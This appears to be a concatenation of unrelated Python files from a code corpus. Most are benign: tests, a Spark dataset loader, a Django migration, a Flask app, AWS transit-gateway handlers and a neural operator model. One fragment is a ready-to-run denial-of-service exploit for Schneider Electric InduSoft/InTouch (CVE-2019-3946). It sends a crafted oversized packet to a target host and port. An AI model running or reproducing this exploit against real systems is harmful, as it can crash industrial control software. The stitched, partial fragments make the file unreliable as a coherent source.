('single-user-info', {'username': 'test'}),
('form-validator', {}),
('data-map', {}),
('data-map-polygon', {}),
('send-support-email', {}),
('form-validator', {})
]
|
StarcoderdataPython
|
9622653
|
import math
import vector
import parametrize_from_file
from pytest import approx
from voluptuous import Schema, Optional
from parametrize_from_file.voluptuous import Namespace
with_math = Namespace('from math import *')
with_vec = with_math.fork('from vector import *')
@parametrize_from_file(
schema=Schema({
'angle': with_math.eval,
Optional('unit', default='deg'): str,
Optional('magnitude', default='1'): with_math.eval,
'expected': with_vec.eval,
}),
)
def test_from_angle(angle, unit, magnitude, expected):
actual = vector.from_angle(angle, unit=unit, magnitude=magnitude)
assert actual.x == approx(expected.x)
assert actual.y == approx(expected.y)
|
StarcoderdataPython
|
6662925
|
from __future__ import annotations
from dataclasses import dataclass
import glob
from pathlib import Path
from typing import Callable, Generic, List, Tuple, TypeVar, Union, Optional
from kgdata.spark import get_spark_context
from sm.misc import deserialize_byte_lines, deserialize_lines, identity_func
from tqdm import tqdm
V = TypeVar("V")
@dataclass
class Dataset(Generic[V]):
# pattern to files (e.g., /*.gz)
file_pattern: Union[str, Path]
deserialize: Callable[[str], V]
filter: Optional[Callable[[str], bool]] = None
# whether the deserialize function is an identity function
# only happens when is this a list of string
is_deser_identity: bool = False
@staticmethod
def string(file_pattern: Union[str, Path]) -> Dataset[str]:
return Dataset(
file_pattern, deserialize=identity_func, filter=None, is_deser_identity=True
)
def get_files(self) -> List[str]:
return glob.glob(str(self.file_pattern))
def get_rdd(self):
rdd = get_spark_context().textFile(str(self.file_pattern))
if self.filter is not None:
rdd = rdd.filter(self.filter)
if not self.is_deser_identity:
return rdd.map(self.deserialize)
return rdd
def get_dict(self: Dataset[Tuple[str, str]], rstrip: bool = True):
assert self.filter is None, "Does not support filtering for non-rdd usage yet."
output = {}
if rstrip:
for file in tqdm(self.get_files(), desc="read dataset"):
for line in deserialize_lines(file):
k, v = self.deserialize(line.rstrip())
output[k] = v
else:
for file in tqdm(self.get_files(), desc="read dataset"):
for line in deserialize_lines(file):
k, v = self.deserialize(line)
output[k] = v
return output
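# Minimal usage sketch (illustrative only; the glob path is a placeholder assumption):
#
#     lines = Dataset.string("/data/dumps/*.txt")   # Dataset[str]
#     files = lines.get_files()                     # local files matching the glob
#     rdd = lines.get_rdd()                         # Spark RDD of raw lines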
|
StarcoderdataPython
|
8161240
|
<reponame>bate/c3nav<gh_stars>1-10
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-10 13:30
from __future__ import unicode_literals
import c3nav.mapdata.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mapdata', '0069_auto_20170510_1329'),
]
operations = [
migrations.CreateModel(
name='Point',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('geometry', c3nav.mapdata.fields.GeometryField(geomtype='point')),
('space', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='points', to='mapdata.Space', verbose_name='space')),
],
options={
'verbose_name': 'Point',
'verbose_name_plural': 'Points',
'default_related_name': 'points',
},
),
]
|
StarcoderdataPython
|
55000
|
# flake8: noqa
__version__ = "0.1.4"
from .quantity_array import QuantityArray
from .quantity_set import QuantitySet
|
StarcoderdataPython
|
1904710
|
##
# Exploit Title: Schneider Electric InduSoft/InTouch DoS
# Date: 06/11/2019
# Exploit Author: <NAME>
# CVE : CVE-2019-3946
# Advisory: https://www.tenable.com/security/research/tra-2018-07
# Affected Vendors/Device/Firmware:
# - InduSoft Web Studio v8.1 or prior
# - InTouch Machine Edition 2017 v8.1 or prior
##
import socket, argparse, binascii
from struct import *
parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="InduSoft host")
parser.add_argument("target_port", help="InduSoft port (ie. 1234)", type=int)
args = parser.parse_args()
host = args.target_host
port = args.target_port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((host, port))
data = '\x02\x57\x03\x02\x32' #
data += 'A' * 0x500 #
data += '\x09\x0a\x03' #
s.send(data)
res = s.recv(1024)
print binascii.hexlify(res)
|
StarcoderdataPython
|
346639
|
<gh_stars>0
# encoding: utf-8
__author__ = "<NAME>"
# Taken and adapted from: https://github.com/wdika/NeMo/edit/main/tests/collections/common/loss_inputs.py
from dataclasses import dataclass
import numpy as np
import torch
from tests.collections.common.pl_utils import NUM_BATCHES
@dataclass(frozen=True)
class LossInput:
"""
The input for ``mridc.collections.common.metrics.GlobalAverageLossMetric`` metric tests.
Args:
loss_sum_or_avg: a one dimensional float tensor which contains losses for averaging. Each element is either a
sum or mean of several losses depending on the parameter ``take_avg_loss`` of the
``nemo.collections.common.metrics.GlobalAverageLossMetric`` class.
num_measurements: a one dimensional integer tensor which contains number of measurements which sums or average
values are in ``loss_sum_or_avg``.
"""
loss_sum_or_avg: torch.Tensor
num_measurements: torch.Tensor
NO_ZERO_NUM_MEASUREMENTS = LossInput(
loss_sum_or_avg=torch.rand(NUM_BATCHES) * 2.0 - 1.0,
num_measurements=torch.randint(1, 100, (NUM_BATCHES,)),
)
SOME_NUM_MEASUREMENTS_ARE_ZERO = LossInput(
loss_sum_or_avg=torch.rand(NUM_BATCHES) * 2.0 - 1.0,
num_measurements=torch.cat(
(
            torch.randint(1, 100, (np.floor_divide(NUM_BATCHES, 2),), dtype=torch.int32),
torch.zeros(NUM_BATCHES - np.floor_divide(NUM_BATCHES, 2), dtype=torch.int32),
)
),
)
ALL_NUM_MEASUREMENTS_ARE_ZERO = LossInput(
loss_sum_or_avg=torch.rand(NUM_BATCHES) * 2.0 - 1.0,
num_measurements=torch.zeros(NUM_BATCHES, dtype=torch.int32),
)
|
StarcoderdataPython
|
6608028
|
<reponame>DudeNr33/pyinstaller-versionfile<filename>test/unittest/test_writer.py
"""
Author: <NAME>
Unit tests for pyinstaller_versionfile.writer.
"""
try:
from unittest import mock
except ImportError:
import mock # Python 2.7
import pytest
from pyinstaller_versionfile.writer import Writer
from pyinstaller_versionfile.exceptions import InternalUsageError, UsageError
TEST_VERSION = "0.8.1.5"
TEST_COMPANY_NAME = "TestCompany"
TEST_FILE_DESCRIPTION = "TestFileDescription"
TEST_INTERNAL_NAME = "TestInternalName"
TEST_LEGAL_COPYRIGHT = "TestLegalCopyright"
TEST_ORIGINAL_FILENAME = "TestOriginalFilename"
TEST_PRODUCT_NAME = "TestProductName"
@pytest.fixture(name="metadata_mock")
def fixture_metadata_mock():
"""
Create a mock object for a MetaData instance that can be passed to the writer class.
Pre-populate the 'to_dict' method to return valid content.
The return value is taken from the 'params' attribute on the mock and can be changed easily for testing purposes.
"""
metadata_mock = mock.MagicMock()
metadata_mock.params = {
"Version": TEST_VERSION,
"CompanyName": TEST_COMPANY_NAME,
"FileDescription": TEST_FILE_DESCRIPTION,
"InternalName": TEST_INTERNAL_NAME,
"LegalCopyright": TEST_LEGAL_COPYRIGHT,
"OriginalFilename": TEST_ORIGINAL_FILENAME,
"ProductName": TEST_PRODUCT_NAME,
}
metadata_mock.to_dict.return_value = metadata_mock.params
return metadata_mock
@pytest.fixture(name="prepared_writer")
def fixture_writer(metadata_mock):
"""
Writer object with already rendered content.
"""
writer = Writer(metadata_mock)
writer.render()
return writer
@pytest.mark.parametrize(
"attribute,value", [
("CompanyName", TEST_COMPANY_NAME),
("FileDescription", TEST_FILE_DESCRIPTION),
("FileVersion", TEST_VERSION),
("InternalName", TEST_INTERNAL_NAME),
("LegalCopyright", TEST_LEGAL_COPYRIGHT),
("OriginalFilename", TEST_ORIGINAL_FILENAME),
("ProductName", TEST_PRODUCT_NAME),
("ProductVersion", TEST_VERSION)
]
)
def test_render_valid_parameters_creates_correct_content(metadata_mock, attribute, value):
"""
Check rendering of file content if provided values are complete and correct.
"""
writer = Writer(metadata=metadata_mock)
writer.render()
assert "StringStruct(u'{}', u'{}')".format(attribute, value) in writer._content # pylint: disable=protected-access
@pytest.mark.parametrize(
"deleted_attribute",
# pylint: disable=duplicate-code
[
"Version",
"CompanyName",
"FileDescription",
"InternalName",
"LegalCopyright",
"OriginalFilename",
"ProductName",
]
)
def test_render_missing_parameter_raises_internalusageerror(metadata_mock, deleted_attribute):
"""
If any of the required parameters is missing when rendering the file content, a KeyError shall be raised.
"""
del metadata_mock.params[deleted_attribute]
writer = Writer(metadata=metadata_mock)
with pytest.raises(InternalUsageError):
writer.render()
def test_save_without_rendering_before_raises_usage_error():
"""
Trying to write the versionfile to disk is pointless if the content has not been rendered yet.
Since these two actions have to be triggered by the caller, he must be informed if he forgets to render before
saving.
"""
writer = Writer(metadata=mock.Mock())
with pytest.raises(InternalUsageError):
writer.save("version_file.txt")
@pytest.mark.parametrize(
"filename",
[
"version_file.txt", # most common case
"versionfile", # no file ending
".versionfile", # leading dot
]
)
def test_save_valid_filepath_saves_content(prepared_writer, tmpdir, filename):
"""
If given a valid filepath, the contents shall be saved correctly.
"""
filepath = tmpdir / filename
prepared_writer.save(str(filepath))
assert filepath.read_text("utf-8") == prepared_writer._content # pylint: disable=protected-access
def test_save_file_exists_overwrites_file(prepared_writer, tmpdir):
"""
If the file already exists, it shall be overwritten.
"""
filepath = tmpdir / "already_exists.txt"
filepath.write_text("This is the previous content", "utf-8")
prepared_writer.save(str(filepath))
assert filepath.read_text("utf-8") == prepared_writer._content # pylint: disable=protected-access
def test_save_directory_passed_raises_usageerror(prepared_writer, tmpdir):
"""
    If the value passed to 'save' is a directory, a UsageError shall be raised.
"""
with pytest.raises(UsageError):
prepared_writer.save(str(tmpdir))
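# Hypothetical invocation from the repository root (path taken from the filename header above):
#   pytest test/unittest/test_writer.py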
|
StarcoderdataPython
|
9690872
|
# -*- coding:utf-8 -*-
from re import sub
from itertools import islice
'''
How to adjust the text format of a string
'''
# Convert the dates in a log file to the US date format mm/dd/yyyy
# Use the sub function from the re module to perform the replacement
with open("./log.log", "r") as f:
    for line in islice(f, 0, None):
        # print(sub(r"(\d{4})-(\d{2})-(\d{2})", r"\2/\3/\1", line))
        # Each match group can also be given a name and referenced by it
        print(sub(r"(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})", r"\g<month>/\g<day>/\g<year>", line))
|
StarcoderdataPython
|
128302
|
import config
from database import RedditOutfitsDatabase
from util_reddit import generate_thread_ids
'''
This script is run according to Malefashionadvice's, Femalefashionadvice's, and Streetwear's weekly thread(s) schedules.
'''
def process_threads(thread_ids: list, database):
'''
    Given a list of thread IDs, processes each one.
'''
for thread_id in thread_ids:
database.process_thread(thread_id)
database = RedditOutfitsDatabase(
'reddit_outfits', 'redditoutfits', config.redditoutfits_password)
# Retrieve most recent 25 thread IDs for each subreddit.
# By default retrieves 25 results.
malefashionadvice_thread_ids = generate_thread_ids(
'WAYWT', 'AutoModerator', 'malefashionadvice')
femalefashionadvice_thread_ids = generate_thread_ids(
'WAYWT', 'AutoModerator', 'femalefashionadvice')
streetwear_thread_ids = generate_thread_ids(
'WDYWT', 'AutoModerator', 'streetwear')
process_threads(malefashionadvice_thread_ids, database)
process_threads(femalefashionadvice_thread_ids, database)
process_threads(streetwear_thread_ids, database)
database.close()
|
StarcoderdataPython
|
6592198
|
from .base import Marshal, ConstReader, FixedSizer, EMPTY_CONTEXT, MinMax
from .errors import InstructError, InvalidValueError
from ._compat import pad
PADDING_DIRECTION_NONE = 0
PADDING_DIRECTION_RIGHT = 1
PADDING_DIRECTION_LEFT = 2
PADDING_DIRECTION_BOTH = 3
def _strip(obj, dir, padding):
if dir == PADDING_DIRECTION_NONE:
return obj
elif dir == PADDING_DIRECTION_RIGHT:
return obj.rstrip(padding)
elif dir == PADDING_DIRECTION_LEFT:
return obj.lstrip(padding)
else:
return obj.strip(padding)
def _pad(obj, size, dir, padding):
pad_len = size - len(obj)
if pad_len < 0:
raise InvalidValueError("fixed-size item length is expected to be of length %d or smaller but instead got %d (item=%s)" % (size, len(obj), repr(obj)))
elif pad_len == 0:
return obj
    # Slice (rather than index) the padding so this works for both bytes and str in Python 3.
    if dir == PADDING_DIRECTION_RIGHT or dir == PADDING_DIRECTION_BOTH:
        return obj + padding[:1] * pad_len
    elif dir == PADDING_DIRECTION_LEFT:
        return (padding[:1] * pad_len) + obj
else:
# PADDING_DIRECTION_NONE
raise InvalidValueError("no padding specified but item length %d is smaller than required length %d (item=%s)" %
(len(obj), size, obj))
class VarSizeStringMarshal(Marshal):
def __init__(self, size_marshal, padding=b'\x00', padding_direction=PADDING_DIRECTION_RIGHT):
super(VarSizeStringMarshal, self).__init__()
self.size_marshal = size_marshal
self.padding = padding
self.padding_direction = padding_direction
def create_from_stream(self, stream, context=EMPTY_CONTEXT, *args, **kwargs):
buffer_len = self.size_marshal.create_from_stream(stream, context)
obj = stream.read(buffer_len)
if len(obj) < buffer_len:
raise InstructError("Expected to read %d bytes from stream but read only %d" % (buffer_len, len(obj)))
return _strip(obj, self.padding_direction, self.padding)
def write_to_stream(self, obj, stream, context=EMPTY_CONTEXT):
stripped_obj = _strip(obj, self.padding_direction, self.padding)
self.size_marshal.write_to_stream(len(stripped_obj), stream, context)
stream.write(stripped_obj)
def to_repr(self, obj, context=EMPTY_CONTEXT):
return repr(obj)
def sizeof(self, obj):
return self.size_marshal.sizeof(obj) + len(_strip(obj, self.padding_direction, self.padding))
def min_max_sizeof(self):
size_min_max = self.size_marshal.min_max_sizeof()
return MinMax(size_min_max.min, size_min_max.max + (1 << (size_min_max.max * 8)) - 1)
class PaddedStringMarshal(FixedSizer, VarSizeStringMarshal):
def __init__(self, size, padding=b'\x00', padding_direction=PADDING_DIRECTION_RIGHT):
super(PaddedStringMarshal, self).__init__(ConstReader(size), padding, padding_direction)
self.size = size
def write_to_stream(self, obj, stream, context=EMPTY_CONTEXT):
stripped_obj = _strip(obj, self.padding_direction, self.padding)
stream.write(stripped_obj)
if len(stripped_obj) < self.size:
stream.write(pad(self.padding[0], (self.size - len(stripped_obj))))
class VarSizeBufferMarshal(VarSizeStringMarshal):
def __init__(self, size_marshal):
super(VarSizeBufferMarshal, self).__init__(size_marshal, padding=b'', padding_direction=PADDING_DIRECTION_NONE)
class FixedSizeBufferMarshal(PaddedStringMarshal):
def __init__(self, size):
super(FixedSizeBufferMarshal, self).__init__(size, padding=b'', padding_direction=PADDING_DIRECTION_NONE)
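# Hypothetical round-trip sketch (not part of the original module). It assumes ConstReader yields
# its fixed size on read and _compat.pad produces `count` padding bytes, which is how the classes
# above already use them:
#   import io
#   marshal = PaddedStringMarshal(8)
#   buf = io.BytesIO()
#   marshal.write_to_stream(b"abc", buf)    # b"abc" followed by five NUL padding bytes
#   buf.seek(0)
#   marshal.create_from_stream(buf)         # -> b"abc" (trailing padding stripped on read)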
|
StarcoderdataPython
|
4855317
|
"""Example of a single file flask application that uses and open notify API"""
from flask import Flask, redirect
from datetime import datetime
from flask_sqlalchemy import SQLAlchemy
import requests
# Create Flask application instance
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///db.sqlite3"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
DB = SQLAlchemy(app)
# Runs root when we visit "/" endpoint
@app.route("/")
def root():
astro_data = Astro.query.all()
return f'{astro_data}'
@app.route("/refresh")
def refresh():
request = requests.get("http://api.open-notify.org/astros.json")
astro_python_dict = request.json()
num_of_astros = astro_python_dict["number"]
record = Astro(num_astros=num_of_astros, time=datetime.now())
DB.session.add(record)
DB.session.commit()
return redirect("/")
@app.route("/reset_db")
def reset():
DB.drop_all()
DB.create_all()
return redirect("/refresh")
# Creating SQLAlchemy sqlite DB
# Creates Astro table
class Astro(DB.Model):
id = DB.Column(DB.Integer, primary_key=True)
num_astros = DB.Column(DB.Integer, nullable=False)
time = DB.Column(DB.String, nullable=False)
def __repr__(self):
return f"# of Astros: {self.num_astros} at {self.time}"
|
StarcoderdataPython
|
12844097
|
###############################################################################
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the "license" file accompanying this file. This file is distributed #
# on an "AS IS" BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the #
# specific language governing permissions #
# and limitations under the License. #
###############################################################################
# !/bin/python
from botocore.exceptions import ClientError
from lib.decorator import try_except_retry
from aws.utils.boto3_session import Boto3Session
class TgwPeeringAttachmentAPIHandler(Boto3Session):
def __init__(self, logger, region, **kwargs):
self.logger = logger
self.__service_name = 'ec2'
self.region = region
kwargs.update({'region': self.region})
super().__init__(self.logger, self.__service_name, **kwargs)
self.ec2_client = super().get_client()
@try_except_retry()
def describe_transit_gateway_peering_attachments(self,
tgw_id: str,
states: list) -> list:
"""
Describe the tgw peering attachments for the tagged tgw id
:param tgw_id: tgw id of the tagged transit gateway
:param states: use the state to limit the returned response
:return: list of transit gateway peering attachments
"""
try:
response = self.ec2_client\
.describe_transit_gateway_peering_attachments(
Filters=[
{
'Name': 'transit-gateway-id',
'Values': [tgw_id]
},
{
'Name': 'state',
'Values': states
}
]
)
transit_gateway_peering_attachments_list = response.get(
'TransitGatewayPeeringAttachments', [])
next_token = response.get('NextToken', None)
while next_token is not None:
self.logger.info("Handling Next Token: {}".format(next_token))
response = self.ec2_client\
.describe_transit_gateway_peering_attachments(
Filters=[
{
'Name': 'transit-gateway-id',
'Values': [tgw_id]
},
{
'Name': 'state',
'Values': states
}
],
NextToken=next_token)
self.logger.info("Extending TGW Peering Attachment List")
transit_gateway_peering_attachments_list \
.extend(response.get('TransitGatewayPeeringAttachments',
[]))
next_token = response.get('NextToken', None)
return transit_gateway_peering_attachments_list
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
def create_transit_gateway_peering_attachment(self,
tgw_id: str,
peer_tgw_id: str,
peer_account_id,
peer_region) -> dict:
"""
Create tgw peering attachment
:param tgw_id: REQUIRED - transit gateway id of the local region
:param peer_tgw_id: REQUIRED - id for peer transit gateway hosted in
the peer region
:param peer_account_id: REQUIRED - current account id
:param peer_region: peer region where peer transit gateway is hosted
:return: details for the tgw peering attachment
"""
try:
response = self.ec2_client\
.create_transit_gateway_peering_attachment(
TransitGatewayId=tgw_id,
PeerTransitGatewayId=peer_tgw_id,
PeerAccountId=peer_account_id,
PeerRegion=peer_region,
)
return response.get('TransitGatewayPeeringAttachment')
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
def delete_transit_gateway_peering_attachment(self,
tgw_attach_id: str) -> str:
"""
Delete tgw peering attachment
:param tgw_attach_id: REQUIRED - transit gateway peering attachment id
:return: current state of the peering attachment
"""
try:
response = self.ec2_client\
.delete_transit_gateway_peering_attachment(
TransitGatewayAttachmentId=tgw_attach_id
)
return response.get('TransitGatewayPeeringAttachment').get('State')
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
def accept_transit_gateway_peering_attachment(self,
tgw_attach_id: str) -> str:
"""
Accept tgw peering attachment
:param tgw_attach_id: REQUIRED - transit gateway peering attachment id
:return: current state of the peering attachment
"""
try:
response = self.ec2_client\
.accept_transit_gateway_peering_attachment(
TransitGatewayAttachmentId=tgw_attach_id
)
return response.get('TransitGatewayPeeringAttachment').get('State')
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
    def get_transit_gateway_peering_attachment_state(self,
                                                     tgw_attachment_id) -> str:
        """
        Get the current state of a tgw peering attachment
        :param tgw_attachment_id: id of the transit gateway peering attachment
        :return: current state of the transit gateway peering attachment
"""
try:
response = self.ec2_client\
.describe_transit_gateway_peering_attachments(
TransitGatewayAttachmentIds=[tgw_attachment_id])
transit_gateway_peering_attachments_list = response.get(
'TransitGatewayPeeringAttachments', [])
next_token = response.get('NextToken', None)
while next_token is not None:
self.logger.info(
"Handling Next Token: {}".format(next_token))
response = self.ec2_client \
.describe_transit_gateway_peering_attachments(
TransitGatewayAttachmentIds=[tgw_attachment_id],
NextToken=next_token)
self.logger.info("Extending TGW Peering Attachment List")
transit_gateway_peering_attachments_list \
.extend(response.get('TransitGatewayPeeringAttachments',
[]))
next_token = response.get('NextToken', None)
state = transit_gateway_peering_attachments_list[0].get('State')
return state
except ClientError as error:
self.logger.log_unhandled_exception(error)
raise
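# Hypothetical usage sketch (requires valid AWS credentials, a logger compatible with Boto3Session,
# and placeholder resource ids):
#   handler = TgwPeeringAttachmentAPIHandler(logger, 'us-east-1')
#   attachments = handler.describe_transit_gateway_peering_attachments(
#       'tgw-0123456789abcdef0', ['available', 'pendingAcceptance'])
#   state = handler.get_transit_gateway_peering_attachment_state('tgw-attach-0123456789abcdef0')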
|
StarcoderdataPython
|
9646830
|
<reponame>Forbu/fourier_neural_operator
"""
@author: <NAME> This file is the Fourier Neural Operator for 2D problem such
as the Navier-Stokes equation discussed in Section 5.3 in the
[paper](https://arxiv.org/pdf/2010.08895.pdf), which uses a recurrent structure
to propagates in time.
this part of code is taken from :
https://github.com/alasdairtran/fourierflow/tree/97e6cfb0848e44d3a7bc1d063b1ab86bc4c603ee
"""
from functools import partial
import torch
import torch.nn as nn
from einops import rearrange
from einops.layers.torch import Rearrange, Reduce
from einops import rearrange, reduce, repeat
import numpy as np
import fourier_neural_operator.layers.fourier_2d_factorized_v2 as fourier_2d_factorized_v2
import fourier_neural_operator.layers.linear as linear
class ffno_v2(nn.Module):
def __init__(self, modes, width, input_dim=12, output_dim=1, dropout=0.0, in_dropout=0.0,
n_layers=4, linear_out: bool = False, share_weight: bool = False,
avg_outs=False, next_input='subtract', share_fork=False, factor=2,
norm_locs=[], group_width=16, ff_weight_norm=False, n_ff_layers=2,
gain=1, layer_norm=False, use_fork=False, mode='full'):
super().__init__()
"""
The overall network. It contains 4 layers of the Fourier layer.
        1. Lift the input to the desired channel dimension by self.fc0.
2. 4 layers of the integral operators u' = (W + K)(u).
W defined by self.w; K defined by self.conv .
3. Project from the channel space to the output space by self.fc1 and self.fc2 .
input: the solution of the previous 10 timesteps + 2 locations (u(t-10, x, y), ..., u(t-1, x, y), x, y)
input shape: (batchsize, x=64, y=64, c=12)
output: the solution of the next timestep
output shape: (batchsize, x=64, y=64, c=1)
"""
self.modes = modes
self.width = width
self.input_dim = input_dim
self.in_proj = linear.WNLinear(input_dim + 2, self.width, wnorm=ff_weight_norm)
self.drop = nn.Dropout(in_dropout)
self.next_input = next_input
self.avg_outs = avg_outs
self.n_layers = n_layers
self.norm_locs = norm_locs
self.use_fork = use_fork
# input channel is 12: the solution of the previous 10 timesteps + 2 locations (u(t-10, x, y), ..., u(t-1, x, y), x, y)
self.forecast_ff = self.backcast_ff = None
if share_fork:
if use_fork:
self.forecast_ff = fourier_2d_factorized_v2.FeedForward(
width, factor, ff_weight_norm, n_ff_layers, layer_norm, dropout)
self.backcast_ff = fourier_2d_factorized_v2.FeedForward(
width, factor, ff_weight_norm, n_ff_layers, layer_norm, dropout)
self.fourier_weight = None
if share_weight:
self.fourier_weight = nn.ParameterList([])
for _ in range(2):
weight = torch.FloatTensor(width, width, modes, modes, 2)
param = nn.Parameter(weight)
nn.init.xavier_normal_(param, gain=gain)
self.fourier_weight.append(param)
self.spectral_layers = nn.ModuleList([])
for _ in range(n_layers):
self.spectral_layers.append(fourier_2d_factorized_v2.SpectralConv2d(in_dim=width,
out_dim=width,
n_modes=modes,
forecast_ff=self.forecast_ff,
backcast_ff=self.backcast_ff,
fourier_weight=self.fourier_weight,
factor=factor,
norm_locs=norm_locs,
group_width=group_width,
ff_weight_norm=ff_weight_norm,
n_ff_layers=n_ff_layers,
layer_norm=layer_norm,
use_fork=use_fork,
dropout=dropout,
mode=mode))
self.out = nn.Sequential(
linear.WNLinear(self.width, 128, wnorm=ff_weight_norm),
linear.WNLinear(128, output_dim, wnorm=ff_weight_norm))
def forward(self, x, **kwargs):
# x.shape == [n_batches, *dim_sizes, input_size]
grid = self.get_grid(x.shape, x.device)
x = torch.cat((x, grid), dim=-1)
forecast = 0
x = self.in_proj(x)
x = self.drop(x)
forecast_list = []
for i in range(self.n_layers):
layer = self.spectral_layers[i]
b, f = layer(x)
if self.use_fork:
f_out = self.out(f)
forecast = forecast + f_out
forecast_list.append(f_out)
if self.next_input == 'subtract':
x = x - b
elif self.next_input == 'add':
x = x + b
if not self.use_fork:
forecast = self.out(b)
if self.avg_outs:
forecast = forecast / len(self.spectral_layers)
return forecast
def get_grid(self, shape, device):
batchsize, size_x, size_y = shape[0], shape[1], shape[2]
gridx = torch.tensor(np.linspace(0, 1, size_x), dtype=torch.float)
gridx = gridx.reshape(1, size_x, 1, 1).repeat([batchsize, 1, size_y, 1])
gridy = torch.tensor(np.linspace(0, 1, size_y), dtype=torch.float)
gridy = gridy.reshape(1, 1, size_y, 1).repeat([batchsize, size_x, 1, 1])
return torch.cat((gridx, gridy), dim=-1).to(device)
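# Hypothetical forward-pass sketch (untrained weights; shapes follow the docstring above):
#   model = ffno_v2(modes=12, width=32, input_dim=12, output_dim=1)
#   x = torch.rand(4, 64, 64, 12)   # (batch, x, y, input_dim); grid coordinates are appended internally
#   y = model(x)                    # -> (4, 64, 64, 1)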
|
StarcoderdataPython
|
11234635
|
from getFolderFromRepo import *
def test_proper_filepath():
def is_valid_filepath(path: str) -> bool:
# should start with /
# should not end with /
# so it should be / or /a or /a.../b
assert path.startswith("/")
if len(path) != 1:
assert not path.endswith("/")
paths = ["", "/", "/a", "/a/", "//", "a/b", "/a/b", "/a/b/"]
for path in paths:
proper_path = proper_filepath(path)
print(path, proper_path, sep="\t\t")
is_valid_filepath(proper_path)
def test_rel_path():
import os
for data in [
("https://github.com/owner/repo", "repo", "file", "repo/file"),
("https://github.com/owner/repo", "repo", "folder1/file", "repo/folder1/file"),
("https://github.com/owner/repo/tree/branch/folder1", "folder1", "folder1/file", "folder1/file"),
("https://github.com/owner/repo/tree/branch/folder1/folder2", "folder2", "folder1/folder2/file", "folder2/file"),
("https://github.com/owner/repo/blob/branch/folder1/folder2/file", "file", "folder1/folder2/file", "file"),
]:
url, last_element, path, new_path = data
assert get_last_element(url) == last_element
assert get_new_path(path, last_element) == new_path
if __name__ == "__main__":
test_proper_filepath()
test_rel_path()
|
StarcoderdataPython
|
3254863
|
import numpy as np
import h5py
import os
from wormpose.dataset.loader import load_dataset
def save_results(dataset_loader, dataset_path, results_root_dir):
dataset = load_dataset(dataset_loader, dataset_path)
all_scores = []
all_theta = []
for video_name in sorted(os.listdir(results_root_dir)):
results_file = os.path.join(results_root_dir, video_name, "results.h5")
features = dataset.features_dataset[video_name]
timestamp = features.timestamp
with h5py.File(results_file, "r") as f:
scores = f["unaligned"]["scores"][:]
thetas = f["unaligned"]["theta"][:]
max_scores = np.argmax(scores, axis=1)
results_scores = scores[np.arange(scores.shape[0]), max_scores]
results_theta = thetas[np.arange(thetas.shape[0]), max_scores]
non_resampled_scores = []
non_resampled_theta= []
for cur_time, (score, theta) in enumerate(zip(results_scores, results_theta)):
frame_index = np.where(timestamp == cur_time)[0]
if len(frame_index) == 0:
continue
cur_frame_index = frame_index[0]
non_resampled_scores.append(score)
non_resampled_theta.append(theta)
all_scores.append(non_resampled_scores)
all_theta.append(non_resampled_theta)
print(video_name, len(non_resampled_scores))
all_scores = np.concatenate(all_scores)
all_theta = np.concatenate(all_theta)
print(len(all_scores))
np.savetxt("all_scores.txt", all_scores)
np.save("all_theta.npy", all_theta)
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("dataset_loader", type=str, help="Dataset loader (tierpsy or other)")
parser.add_argument("dataset_path", type=str, help="root path of a wormpose Dataset")
parser.add_argument("results_root_dir", type=str, help="Root folder where to find wormpose results")
args = parser.parse_args()
save_results(**vars(args))
if __name__ == "__main__":
main()
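# Hypothetical invocation (the script filename and paths are placeholders):
#   python save_results.py tierpsy /path/to/wormpose_dataset /path/to/results_root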
|
StarcoderdataPython
|
8112844
|
<gh_stars>1-10
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Publisher constants: request commands and parameters, response header names.
"""
# Delimiter for multi-part parameters (array-parameters).
MULTI_PART_PARAMETER_DELIMITER = ","
POI_SEARCH_SERVICE_NAME = "POISearch"
DEFAULT_SEARCH_SERVICE_NAME = "GeocodingFederated"
HOST_NAME = "Host"
# Request commands.
CMD = "Cmd"
CMD_PING = "Ping"
CMD_RESET = "Reset"
CMD_QUERY = "Query"
CMD_ADD_DB = "AddDb"
CMD_DELETE_DB = "DeleteDb"
CMD_CLEANUP_DB = "CleanupDb"
CMD_PUBLISH_DB = "PublishDb"
CMD_REPUBLISH_DB = "RepublishDb"
CMD_SWAP_TARGETS = "SwapTargets"
CMD_UNPUBLISH_DB = "UnPublishDb"
CMD_SYNC_DB = "SyncDb"
CMD_ADD_VS = "AddVs"
CMD_DELETE_VS = "DeleteVs"
CMD_DISABLE_VS = "DisableVs"
CMD_ADD_SEARCH_DEF = "AddSearchDef"
CMD_DELETE_SEARCH_DEF = "DeleteSearchDef"
CMD_ADD_PLUGIN = "AddPlugin"
CMD_DELETE_PLUGIN = "DeletePlugin"
CMD_DECREMENT_COUNT = "DecrementCount"
CMD_LOCAL_TRANSFER = "LocalTransfer"
CMD_GARBAGE_COLLECT = "GarbageCollect"
CMD_CLEANUP = "Cleanup"
CMD_ADD_SNIPPET_SET = "AddSnippetSet"
CMD_DELETE_SNIPPET_SET = "DeleteSnippetSet"
# Request Params.
